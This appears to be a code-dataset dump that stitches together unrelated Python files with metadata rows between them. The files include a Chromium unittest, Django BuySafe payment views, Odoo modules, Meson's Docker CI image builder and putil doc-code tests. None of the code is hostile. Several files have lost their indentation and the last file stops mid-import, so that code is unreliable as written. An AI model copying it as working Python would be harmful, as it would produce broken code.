# Child layers are very handy because they transform together with their parent.
# For example, if the parent layer rotates, all of its children rotate as well.
# However, all of the layers can still receive separate mouse and keyboard events.
# You can use this to (for example) create a flying creature that responds differently
# when the mouse touches its wings or its head - but where all the body parts stick together.
# Position the child's center at (100,100) relative from the parent's layer origin:
r4 = DraggableRect(x=100, y=100, width=100, height=100, origin=(0.5,0.5), name="purple2")
r4.clr = color(0.25, 0.15, 0.75, 0.5)
r3.append(r4)
# Even more nested child layers:
#r5 = DraggableRect(x=50, y=50, width=50, height=50, origin=(0.5,0.5), name="pink1")
#r5.clr = color(1.00, 0.15, 0.75, 0.5)
#r4.append(r5)
# The canvas is essentially a list of layers, just as an image in Photoshop is a list of layers.
# Appending a layer to the canvas ensures that it gets drawn each frame,
# that it receives mouse and keyboard events, and that its motion tweening is updated.
canvas.append(r1)
canvas.append(r2)
canvas.append(r3)
def draw(canvas):
# There is nothing to draw here;
# all the drawing occurs in the separate layers.
canvas.clear()
canvas.size = 500, 500
canvas.run(draw)
# Note: if you have layers that do not need to receive events,
# set Layer.enabled = False; this saves some time doing expensive matrix operations. | bsd-3-clause | 297,551,862,422,727,740 | 41.913043 | 96 | 0.695212 | false |
was4444/chromium.src | tools/android/loading/loading_graph_view_unittest.py | 1 | 3534 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import loading_graph_view
import request_dependencies_lens
from request_dependencies_lens_unittest import TestRequests
class MockContentClassificationLens(object):
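  """Fake content classification lens: flags requests as ads/tracking by id."""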
def __init__(self, ad_request_ids, tracking_request_ids):
self._ad_requests_ids = ad_request_ids
self._tracking_request_ids = tracking_request_ids
def IsAdRequest(self, request):
return request.request_id in self._ad_requests_ids
def IsTrackingRequest(self, request):
return request.request_id in self._tracking_request_ids
class LoadingGraphViewTestCase(unittest.TestCase):
def setUp(self):
super(LoadingGraphViewTestCase, self).setUp()
self.trace = TestRequests.CreateLoadingTrace()
self.deps_lens = request_dependencies_lens.RequestDependencyLens(self.trace)
def testAnnotateNodesNoLenses(self):
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens)
for node in graph_view.deps_graph.graph.Nodes():
self.assertFalse(node.is_ad)
self.assertFalse(node.is_tracking)
for edge in graph_view.deps_graph.graph.Edges():
self.assertFalse(edge.is_timing)
def testAnnotateNodesContentLens(self):
ad_request_ids = set([TestRequests.JS_REQUEST_UNRELATED_FRAME.request_id])
tracking_request_ids = set([TestRequests.JS_REQUEST.request_id])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens,
content_lens)
for node in graph_view.deps_graph.graph.Nodes():
request_id = node.request.request_id
self.assertEqual(request_id in ad_request_ids, node.is_ad)
self.assertEqual(request_id in tracking_request_ids, node.is_tracking)
def testRemoveAds(self):
ad_request_ids = set([TestRequests.JS_REQUEST_UNRELATED_FRAME.request_id])
tracking_request_ids = set([TestRequests.JS_REQUEST.request_id])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(self.trace, self.deps_lens,
content_lens)
graph_view.RemoveAds()
request_ids = set([n.request.request_id
for n in graph_view.deps_graph.graph.Nodes()])
expected_request_ids = set([r.request_id for r in [
TestRequests.FIRST_REDIRECT_REQUEST,
TestRequests.SECOND_REDIRECT_REQUEST,
TestRequests.REDIRECTED_REQUEST,
TestRequests.REQUEST,
TestRequests.JS_REQUEST_OTHER_FRAME]])
self.assertSetEqual(expected_request_ids, request_ids)
def testRemoveAdsPruneGraph(self):
ad_request_ids = set([TestRequests.SECOND_REDIRECT_REQUEST.request_id])
tracking_request_ids = set([])
content_lens = MockContentClassificationLens(
ad_request_ids, tracking_request_ids)
graph_view = loading_graph_view.LoadingGraphView(
self.trace, self.deps_lens, content_lens)
graph_view.RemoveAds()
request_ids = set([n.request.request_id
for n in graph_view.deps_graph.graph.Nodes()])
expected_request_ids = set(
[TestRequests.FIRST_REDIRECT_REQUEST.request_id])
self.assertSetEqual(expected_request_ids, request_ids)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 5,233,397,548,926,028,000 | 41.071429 | 80 | 0.703169 | false |
sumihai-tekindo/account_sicepat | l10n_id_sicepat/__init__.py | 1 | 1032 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2016 Sicepat Ekspres (<http://www.sicepat.com>).
# @author Pambudi Satria <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account | gpl-3.0 | 1,969,656,615,452,393,200 | 45 | 78 | 0.593023 | false |
uranusjr/django-buysafe | buysafe/views.py | 1 | 4538 | # -*- coding: utf8
from django.http import HttpResponseBadRequest, HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.shortcuts import render
from buysafe.models import PaymentMethod
from buysafe.forms import SunTechReceiveForm, BuySafeSendForm, WebATMSendForm
from buysafe.utils import (
call_handler, call_handler_and_render, get_payment_form,
default_order_info_handler, make_response_handler
)
PAYMENT_SEND_FORMS = {
PaymentMethod.TYPE_BUYSAFE: BuySafeSendForm,
PaymentMethod.TYPE_WEBATM: WebATMSendForm
}
def entry(request, order_id, template='buysafe/entry.html'):
return render(request, template, {'order_id': order_id})
@require_POST
def start(request, template='buysafe/start.html'):
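    # Build a pre-filled, checksummed send-form for every enabled payment
    # method; the template shows one submit button per form.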
keyword_args = {}
for k in request.POST:
keyword_args[k] = request.POST[k]
context = {}
info = call_handler(
'BUYSAFE_FORM_VALUES_GENERATOR',
default_order_info_handler,
request=request, context=context, **keyword_args
)
forms = []
payment_methods = PaymentMethod.enabled.all()
for method in payment_methods:
form_model = PAYMENT_SEND_FORMS[method.payment_type]
info['store_name'] = method.store_id
form = form_model(
store_password=method.password, initial=info
)
form.fill_checksum()
form.submit_button_title = method.name
forms.append(form)
context['forms'] = forms
return call_handler_and_render(
'BUYSAFE_START_HANDLER', None,
request=request, template=template, context=context,
forms=forms, payment_methods=payment_methods
)
@csrf_exempt
@require_POST
def success(request, payment_type, template='buysafe/success.html'):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_SUCCESS_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
context['data'] = form.cleaned_data
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_SUCCESS_BACKGROUND_HANDLER',
make_response_handler(HttpResponse),
request=request, context=context, form=form
)
return call_handler_and_render(
'BUYSAFE_SUCCESS_RENDER_HANDLER', None,
request=request, template=template, context=context, form=form
)
@csrf_exempt
@require_POST
def fail(request, payment_type, template='buysafe/fail.html'):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_FAIL_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
context['data'] = form.cleaned_data
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_FAIL_BACKGROUND_HANDLER',
make_response_handler(HttpResponse),
request=request, context=context, form=form
)
return call_handler_and_render(
'BUYSAFE_FAIL_RENDER_HANDLER', None,
request=request, template=template, context=context, form=form
)
@csrf_exempt
@require_POST
def check(request, payment_type):
context = {}
payment_type = int(payment_type)
form = get_payment_form(payment_type, request.POST)
if form is None:
return call_handler_and_render(
'BUYSAFE_CHECK_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
send_type = form.cleaned_data['send_type']
if send_type == SunTechReceiveForm.SEND_TYPE.BACKGROUND:
return call_handler_and_render(
'BUYSAFE_CHECK_HANDLER',
make_response_handler(HttpResponse, '0000'),
request=request, context=context, form=form
)
return HttpResponse('0000')
return call_handler_and_render(
'BUYSAFE_CHECK_INVALID_HANDLER',
make_response_handler(HttpResponseBadRequest),
request=request, context=context, form=form
)
| bsd-3-clause | 1,343,312,534,143,397,400 | 32.614815 | 77 | 0.667254 | false |
rndusr/stig | tests/client_test/aiotransmission_test/api_freespace_test.py | 1 | 1115 | from types import SimpleNamespace
import asynctest
from asynctest import CoroutineMock, Mock, call
from stig.client.aiotransmission.api_freespace import FreeSpaceAPI
class TestFreeSpaceAPI(asynctest.ClockedTestCase):
async def setUp(self):
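        # Fake the Transmission RPC so no real daemon is needed for the test.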
self.rpc = SimpleNamespace(free_space=CoroutineMock())
self.freespace = FreeSpaceAPI((), self.rpc, Mock())
async def test_expected_path_matches(self):
self.rpc.free_space.return_value = {'path': '/some/path', 'size-bytes': 123}
self.assertEqual(await self.freespace.get_free_space('/some/path'), 123)
self.assertEqual(self.rpc.free_space.call_args_list, [call(path='/some/path')])
async def test_expected_path_mismatches(self):
self.rpc.free_space.return_value = {'path': '/different/path', 'size-bytes': 123}
with self.assertRaises(RuntimeError) as cm:
await self.freespace.get_free_space('/some/path')
self.assertEqual(str(cm.exception), "Expected path '/some/path', got '/different/path'")
self.assertEqual(self.rpc.free_space.call_args_list, [call(path='/some/path')])
| gpl-3.0 | 8,247,601,294,170,028,000 | 45.458333 | 96 | 0.698655 | false |
lavotap/pylib | pylib/vector.py | 1 | 6075 | #!/usr/bin/env python
#-*-coding:utf-8-*-
import math
from number import Number
class Vector(object):
    # Check whether the given object behaves like a vector
@classmethod
def is_vector(cls,vector):
if hasattr(vector,'get_value'):
return True
else:
return False
def __init__(self,x=0,y=0,z=0):
if hasattr(x,'__getitem__'):
self.x=x[0]
self.y=x[1]
if len(x)==3:
self.z=x[2]
else:
self.z=0
elif Vector.is_vector(x):
self.x=x.x
self.y=x.y
self.z=x.z
elif Number.is_number(x) and Number.is_number(y) and Number.is_number(z):
self.x=float(x)
self.y=float(y)
self.z=float(z)
else:
print("ERROR:<__init__@Vector>:Can not init.\n")
exit()
self.vector=(self.x,self.y,self.z)
    # Having this method is what is_vector() checks for
def get_value(self):
return (self.x,self.y,self.z)
def __str__(self):
if self.z!=0:
return("Vector(%s,%s,%s)"%(Number(self.x).format(),Number(self.y).format(),Number(self.z).format()))
else:
return("Vector(%s,%s)"%(Number(self.x).format(),Number(self.y).format()))
def __add__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.x+x,self.y+y,self.z+z)
else:
exit("ERROR:<__add__@Vector>:Can not add.\n")
def __iadd__(self, other):
return Vector(self.vector)+other
def __sub__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.x-x,self.y-y,self.z-z)
else:
exit("ERROR:<__sub__@Vector>:Can not subtract.\n")
def __isub__(self, other):
return Vector(self.vector)-other
def __mul__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return self.x*x+self.y*y+self.z*z
elif Number.is_number(other):
return Vector(self.x*other,self.y*other,self.z*other)
else:
exit("ERROR:<__mul__@Vector>:Can not multiply.\n")
def __imul__(self, other):
return Vector(self.vector)*other
def __div__(self, other):
if Number.is_number(other):
return Vector(self.x/other,self.y/other,self.z/other)
else:
exit("ERROR:<__div__@Vector>:Can not divide.\n")
def __idiv__(self, other):
return Vector(self.vector)/other
def __floordiv__(self, other):
if Number.is_number(other):
return Vector(self.x//other,self.y//other,self.z//other)
else:
exit("ERROR:<__floordiv__@Vector>:Can not divide.\n")
def __xor__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
return Vector(self.y*z-y*self.z,self.z*x-z*self.x,self.x*y-x*self.y)
else:
exit("ERROR:<__xor__@Vector>:Can not cross multiply.\n")
def __ixor__(self, other):
return Vector(self.vector)^other
def __eq__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
if self.x==x and self.y==y and self.z==z:
return True
else:
return False
else:
exit("ERROR:<__eq__@Vector>:Can not compile.\n")
def __ne__(self, other):
if Vector.is_vector(other):
x=other.x
y=other.y
z=other.z
if self.x==x and self.y==y and self.z==z:
return False
else:
return True
else:
exit("ERROR:<__ne__@Vector>:Can not compile.\n")
    def __gt__(self, other):
        if Vector.is_vector(other):
            if self.get_length()>other.get_length():
                return True
            else:
                return False
        else:
            exit("ERROR:<__gt__@Vector>:Can not compare.\n")
    def __lt__(self, other):
        if Vector.is_vector(other):
            if self.get_length()<other.get_length():
                return True
            else:
                return False
        else:
            exit("ERROR:<__lt__@Vector>:Can not compare.\n")
    def __ge__(self, other):
        if Vector.is_vector(other):
            if self.get_length()>=other.get_length():
                return True
            else:
                return False
        else:
            exit("ERROR:<__ge__@Vector>:Can not compare.\n")
    def __le__(self, other):
        if Vector.is_vector(other):
            if self.get_length()<=other.get_length():
                return True
            else:
                return False
        else:
            exit("ERROR:<__le__@Vector>:Can not compare.\n")
    # Magnitude (length) of the vector
def get_length(self):
return math.sqrt(self.x**2+self.y**2+self.z**2)
    # Unit vector (same direction, length 1)
def get_unit(self):
length=Vector(self.vector).get_length()
return Vector(self.x/length,self.y/length,self.z/length)
    # Unsigned angle, in degrees, between self.vector and the other vector
def get_theta(self,other):
if Vector.is_vector(other):
value=(Vector(self.vector)*other)/(Vector(self.vector).get_length()*other.get_length())
return math.acos(value)/math.pi*180.0
else:
exit("ERROR:<get_theta@Vector>:Can not get theta.\n")
    # Signed angle, in degrees, from self.vector to other: counter-clockwise is positive, clockwise is negative
def get_theta_with_sign(self,other):
theta=self.get_theta(other)
if (Vector(self.vector)^other).z<0:
return theta*-1
else:
return theta
    # Left and right perpendicular vectors (in the XY plane)
def get_left(self):
return Vector(-1*self.y,self.x,0)
def get_right(self):
return Vector(self.y,-1*self.x,0)
| gpl-2.0 | 1,054,030,773,827,123,800 | 27.533654 | 112 | 0.505307 | false |
MostlyOpen/odoo_addons | myo_lab_test/models/lab_test_result_state.py | 1 | 2119 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import api, fields, models
class LabTestResult(models.Model):
_inherit = 'myo.lab_test.result'
state = fields.Selection([
('draft', 'Draft'),
('started', 'Started'),
('transcribed', 'Transcribed'),
('released', 'Released'),
('canceled', 'Canceled'),
], string='Status', default='draft', readonly=True, required=True, help="")
@api.multi
def change_state(self, new_state):
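        # Shared helper used by all the action_* methods below.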
for lab_test_result in self:
lab_test_result.state = new_state
@api.multi
def action_draft(self):
for lab_test_result in self:
lab_test_result.change_state('draft')
@api.multi
def action_started(self):
for lab_test_result in self:
lab_test_result.change_state('started')
@api.multi
def action_transcribed(self):
for lab_test_result in self:
lab_test_result.change_state('transcribed')
@api.multi
def action_select(self):
for lab_test_result in self:
lab_test_result.change_state('released')
@api.multi
def action_cancel(self):
for lab_test_result in self:
lab_test_result.change_state('canceled')
| agpl-3.0 | 5,988,174,225,687,661,000 | 32.634921 | 79 | 0.60689 | false |
QuLogic/meson | ci/ciimage/build.py | 1 | 7346 | #!/usr/bin/env python3
import json
import argparse
import stat
import textwrap
import shutil
import subprocess
from tempfile import TemporaryDirectory
from pathlib import Path
import typing as T
image_namespace = 'mesonbuild'
image_def_file = 'image.json'
install_script = 'install.sh'
class ImageDef:
def __init__(self, image_dir: Path) -> None:
path = image_dir / image_def_file
data = json.loads(path.read_text())
assert isinstance(data, dict)
assert all([x in data for x in ['base_image', 'env']])
assert isinstance(data['base_image'], str)
assert isinstance(data['env'], dict)
self.base_image: str = data['base_image']
self.args: T.List[str] = data.get('args', [])
self.env: T.Dict[str, str] = data['env']
class BuilderBase():
def __init__(self, data_dir: Path, temp_dir: Path) -> None:
self.data_dir = data_dir
self.temp_dir = temp_dir
self.common_sh = self.data_dir.parent / 'common.sh'
self.common_sh = self.common_sh.resolve(strict=True)
self.validate_data_dir()
self.image_def = ImageDef(self.data_dir)
self.docker = shutil.which('docker')
self.git = shutil.which('git')
if self.docker is None:
raise RuntimeError('Unable to find docker')
if self.git is None:
raise RuntimeError('Unable to find git')
def validate_data_dir(self) -> None:
files = [
self.data_dir / image_def_file,
self.data_dir / install_script,
]
if not self.data_dir.exists():
raise RuntimeError(f'{self.data_dir.as_posix()} does not exist')
for i in files:
if not i.exists():
raise RuntimeError(f'{i.as_posix()} does not exist')
if not i.is_file():
raise RuntimeError(f'{i.as_posix()} is not a regular file')
class Builder(BuilderBase):
def gen_bashrc(self) -> None:
out_file = self.temp_dir / 'env_vars.sh'
out_data = ''
# run_tests.py parameters
self.image_def.env['CI_ARGS'] = ' '.join(self.image_def.args)
for key, val in self.image_def.env.items():
out_data += f'export {key}="{val}"\n'
# Also add /ci to PATH
out_data += 'export PATH="/ci:$PATH"\n'
out_file.write_text(out_data)
# make it executable
mode = out_file.stat().st_mode
out_file.chmod(mode | stat.S_IEXEC)
def gen_dockerfile(self) -> None:
out_file = self.temp_dir / 'Dockerfile'
out_data = textwrap.dedent(f'''\
FROM {self.image_def.base_image}
ADD install.sh /ci/install.sh
ADD common.sh /ci/common.sh
ADD env_vars.sh /ci/env_vars.sh
RUN /ci/install.sh
''')
out_file.write_text(out_data)
def do_build(self) -> None:
# copy files
for i in self.data_dir.iterdir():
shutil.copy(str(i), str(self.temp_dir))
shutil.copy(str(self.common_sh), str(self.temp_dir))
self.gen_bashrc()
self.gen_dockerfile()
cmd_git = [self.git, 'rev-parse', '--short', 'HEAD']
res = subprocess.run(cmd_git, cwd=self.data_dir, stdout=subprocess.PIPE)
if res.returncode != 0:
raise RuntimeError('Failed to get the current commit hash')
commit_hash = res.stdout.decode().strip()
cmd = [
self.docker, 'build',
'-t', f'{image_namespace}/{self.data_dir.name}:latest',
'-t', f'{image_namespace}/{self.data_dir.name}:{commit_hash}',
'--pull',
self.temp_dir.as_posix(),
]
if subprocess.run(cmd).returncode != 0:
raise RuntimeError('Failed to build the docker image')
class ImageTester(BuilderBase):
def __init__(self, data_dir: Path, temp_dir: Path, ci_root: Path) -> None:
super().__init__(data_dir, temp_dir)
self.meson_root = ci_root.parent.parent.resolve()
def gen_dockerfile(self) -> None:
out_file = self.temp_dir / 'Dockerfile'
out_data = textwrap.dedent(f'''\
FROM {image_namespace}/{self.data_dir.name}
ADD meson /meson
''')
out_file.write_text(out_data)
def copy_meson(self) -> None:
shutil.copytree(
self.meson_root,
self.temp_dir / 'meson',
ignore=shutil.ignore_patterns(
'.git',
'*_cache',
'__pycache__',
# 'work area',
self.temp_dir.name,
)
)
def do_test(self, tty: bool = False) -> None:
self.copy_meson()
self.gen_dockerfile()
try:
build_cmd = [
self.docker, 'build',
'-t', 'meson_test_image',
self.temp_dir.as_posix(),
]
if subprocess.run(build_cmd).returncode != 0:
raise RuntimeError('Failed to build the test docker image')
test_cmd = []
if tty:
test_cmd = [
self.docker, 'run', '--rm', '-t', '-i', 'meson_test_image',
'/bin/bash', '-c', ''
+ 'cd meson;'
+ 'source /ci/env_vars.sh;'
+ f'echo -e "\\n\\nInteractive test shell in the {image_namespace}/{self.data_dir.name} container with the current meson tree";'
+ 'echo -e "The file ci/ciimage/user.sh will be sourced if it exists to enable user specific configurations";'
+ 'echo -e "Run the following command to run all CI tests: ./run_tests.py $CI_ARGS\\n\\n";'
+ '[ -f ci/ciimage/user.sh ] && exec /bin/bash --init-file ci/ciimage/user.sh;'
+ 'exec /bin/bash;'
]
else:
test_cmd = [
self.docker, 'run', '--rm', '-t', 'meson_test_image',
'/bin/bash', '-c', 'source /ci/env_vars.sh; cd meson; ./run_tests.py $CI_ARGS'
]
if subprocess.run(test_cmd).returncode != 0 and not tty:
raise RuntimeError('Running tests failed')
finally:
cleanup_cmd = [self.docker, 'rmi', '-f', 'meson_test_image']
subprocess.run(cleanup_cmd).returncode
def main() -> None:
parser = argparse.ArgumentParser(description='Meson CI image builder')
parser.add_argument('what', type=str, help='Which image to build / test')
parser.add_argument('-t', '--type', choices=['build', 'test', 'testTTY'], help='What to do', required=True)
args = parser.parse_args()
ci_root = Path(__file__).parent
ci_data = ci_root / args.what
with TemporaryDirectory(prefix=f'{args.type}_{args.what}_', dir=ci_root) as td:
ci_build = Path(td)
print(f'Build dir: {ci_build}')
if args.type == 'build':
builder = Builder(ci_data, ci_build)
builder.do_build()
elif args.type == 'test':
tester = ImageTester(ci_data, ci_build, ci_root)
tester.do_test()
elif args.type == 'testTTY':
tester = ImageTester(ci_data, ci_build, ci_root)
tester.do_test(tty=True)
if __name__ == '__main__':
main()
| apache-2.0 | -3,836,532,305,260,080,600 | 33.650943 | 148 | 0.539613 | false |
pmacosta/putil | tests/test_doccode.py | 1 | 12976 | # test_doccode.py
# Copyright (c) 2013-2016 Pablo Acosta-Serafini
# See LICENSE for details
# pylint: disable=C0111,C0302,E1129,R0914,R0915,W0212,W0640
# Standard library imports
from __future__ import print_function
import os
import shutil
import subprocess
import sys
# PyPI imports
import matplotlib
# Putil imports
import putil.misc
from putil.test import AE
# Default to non-interactive PNG to avoid any
# matplotlib back-end misconfiguration
matplotlib.rcParams['backend'] = 'Agg'
###
# Functions
###
def export_image(fname, method=True):
tdir = os.path.dirname(
os.path.dirname(os.path.abspath(__file__))
)
artifact_dir = os.path.join(tdir, 'artifacts')
if not os.path.exists(artifact_dir):
os.makedirs(artifact_dir)
if method:
src = fname
dst = os.path.join(artifact_dir, os.path.basename(fname))
shutil.copyfile(src, dst)
else:
if os.environ.get('APPVEYOR', None):
proc = subprocess.Popen(
['appveyor', 'PushArtifact', os.path.realpath(fname)],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
proc.communicate()
elif os.environ.get('TRAVIS', None):
# If only a few binary files need to be exported a hex dump works,
# otherwise the log can grow past 4MB and the process is terminated
# by Travis
proc = subprocess.Popen(
[
os.path.join(tdir, 'sbin', 'png-to-console.sh'),
os.path.realpath(fname)
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, _ = proc.communicate()
print(stdout)
def test_exdoc_doccode():
""" Test code used in exdoc module """
def remove_header(stdout):
""" Remove py.test header """
actual_text = []
off_header = False
lines = (
stdout.split('\n')
if sys.hexversion < 0x03000000 else
stdout.decode('ascii').split('\n')
)
for line in lines:
off_header = line.startswith('Callable:') or off_header
if off_header:
actual_text.append(line)
return '\n'.join(actual_text)
# Test tracing module #1 (py.test based)
script_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'docs',
'support'
)
script_name = os.path.join(script_dir, 'trace_my_module_1.py')
proc = subprocess.Popen(['python', script_name], stdout=subprocess.PIPE)
stdout, stderr = proc.communicate()
actual_text = remove_header(stdout)
ref_list = []
ref_list.append('Callable: docs.support.my_module.func')
ref_list.append('.. Auto-generated exceptions documentation for')
ref_list.append('.. docs.support.my_module.func')
ref_list.append('')
ref_list.append(':raises: TypeError (Argument \\`name\\` is not valid)')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('Callable: docs.support.my_module.MyClass.value')
ref_list.append('.. Auto-generated exceptions documentation for')
ref_list.append('.. docs.support.my_module.MyClass.value')
ref_list.append('')
ref_list.append(':raises:')
ref_list.append(' * When assigned')
ref_list.append('')
ref_list.append(' * RuntimeError (Argument \\`value\\` is not valid)')
ref_list.append('')
ref_list.append(' * When retrieved')
ref_list.append('')
ref_list.append(' * RuntimeError (Attribute \\`value\\` not set)')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_list.append('')
ref_text = (os.linesep).join(ref_list)
if actual_text != ref_text:
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
assert actual_text == ref_text
# Test tracing module #2 (simple usage based)
script_name = os.path.join(script_dir, 'trace_my_module_2.py')
proc = subprocess.Popen(['python', script_name], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
actual_text = remove_header(stdout)
assert actual_text == ref_text
# Test cogging
script_name = os.path.join(script_dir, 'build-docs.sh')
input_file = os.path.join(script_dir, 'my_module.py')
output_file = os.path.join(script_dir, 'my_module_out.py')
with putil.misc.ignored(OSError):
os.remove(output_file)
bin_dir = os.environ['BIN_DIR']
proc = subprocess.Popen(
[
'python',
os.path.join(bin_dir, 'cog.py'),
'-e',
'-o', output_file,
input_file
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, _ = proc.communicate()
retcode = proc.returncode
if retcode:
print(stdout)
raise RuntimeError('Tracing did not complete successfully')
# Read reference
ref_fname = os.path.join(script_dir, 'my_module_ref.py')
with open(ref_fname, 'r') as fobj:
ref_text = fobj.readlines()
# Read generated output
with open(output_file, 'r') as fobj:
actual_text = fobj.readlines()
with putil.misc.ignored(OSError):
os.remove(output_file)
# First line is the file name, which is different
assert actual_text[1:] == ref_text[1:]
def test_pcsv_doccode():
""" Test code used in pcsv module """
script_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', 'docs', 'support'
)
for num in range(1, 7):
script_name = os.path.join(
script_dir, 'pcsv_example_{0}.py'.format(num))
proc = subprocess.Popen(
['python', script_name], stdout=subprocess.PIPE
)
stdout, stderr = proc.communicate()
if proc.returncode != 0:
print('Script: {0}'.format(script_name))
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
assert proc.returncode == 0
def test_pcontracts_doccode():
""" Test code used in pcontracts module """
# pylint: disable=W0612
from docs.support.pcontracts_example_2 import (custom_contract_a,
custom_contract_b)
@putil.pcontracts.contract(name='custom_contract_a')
def funca(name):
print('My name is {0}'.format(name))
@putil.pcontracts.contract(name='custom_contract_b')
def funcb(name):
print('My name is {0}'.format(name))
AE(funca, RuntimeError, 'Only one exception', name='')
funca('John')
AE(funcb, RuntimeError, 'Empty', name='')
AE(funcb, RuntimeError, 'Invalid name', name='[Bracket]')
funcb('John')
from docs.support.pcontracts_example_3 import (
custom_contract1,
custom_contract2,
custom_contract3,
custom_contract4,
custom_contract5
)
from docs.support.pcontracts_example_3 import (
custom_contract6,
custom_contract7,
custom_contract8,
custom_contract9,
custom_contract10
)
# Contract 1
@putil.pcontracts.contract(name='custom_contract1')
def func1(name):
return name
AE(func1, RuntimeError, 'Invalid name', name='')
assert func1('John') == 'John'
# Contract 2
@putil.pcontracts.contract(name='custom_contract2')
def func2(name):
return name
AE(func2, RuntimeError, 'Invalid name', name='')
assert func2('John') == 'John'
# Contract 3
@putil.pcontracts.contract(name='custom_contract3')
def func3(name):
return name
AE(func3, ValueError, 'Argument `name` is not valid', name='')
assert func3('John') == 'John'
# Contract 4
@putil.pcontracts.contract(name='custom_contract4')
def func4(name):
return name
AE(func4, ValueError, 'Argument `name` is not valid', name='')
assert func4('John') == 'John'
# Contract 5
@putil.pcontracts.contract(name='custom_contract5')
def func5(name):
return name
AE(func5, RuntimeError, 'Invalid name', name='')
assert func5('John') == 'John'
# Contract 6
@putil.pcontracts.contract(name='custom_contract6')
def func6(name):
return name
AE(func6, RuntimeError, 'Invalid name', name='')
assert func6('John') == 'John'
# Contract 7
@putil.pcontracts.contract(name='custom_contract7')
def func7(name):
return name
AE(func7, OSError, 'File could not be opened', name='')
assert func7('John') == 'John'
# Contract 8
@putil.pcontracts.contract(name='custom_contract8')
def func8(name):
return name
AE(func8, RuntimeError, 'Invalid name', name='')
assert func8('John') == 'John'
# Contract 9
@putil.pcontracts.contract(name='custom_contract9')
def func9(name):
return name
AE(func9, TypeError, 'Argument `name` is not valid', name='')
assert func9('John') == 'John'
# Contract 10
@putil.pcontracts.contract(name='custom_contract10')
def func10(name):
return name
AE(func10, RuntimeError, 'Argument `name` is not valid', name='')
assert func10('John') == 'John'
def test_plot_doccode(capsys):
""" Test used in plot module """
# pylint: disable=E1103,R0204
from tests.plot.fixtures import compare_images
script_dir = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'docs',
'support'
)
script_name = os.path.join(script_dir, 'plot_example_1.py')
output_file = os.path.join(script_dir, 'test_image.png')
proc = subprocess.Popen(
['python', script_name, output_file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT
)
stdout, stderr = proc.communicate()
test_fname = output_file
nimages = 11
ref_names = [
'plot_example_1_{0}.png'.format(item) for item in range(1, nimages+1)
]
ref_fnames = [os.path.join(script_dir, item) for item in ref_names]
result = []
for ref_fname in ref_fnames:
try:
result.append(compare_images(ref_fname, test_fname))
except IOError:
print('Error comparing images')
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
raise
if not any(result):
print('Images do not match')
print('STDOUT: {0}'.format(stdout))
print('STDERR: {0}'.format(stderr))
for num, ref_fname in enumerate(ref_fnames):
print(
'Reference image {0}: file://{1}'.format(
num, os.path.realpath(ref_fname)
)
)
print('Actual image: file://{0}'.format(os.path.realpath(test_fname)))
export_image(test_fname)
assert result
with putil.misc.ignored(OSError):
os.remove(test_fname)
# Test ABC example
import numpy
import docs.support.plot_example_2
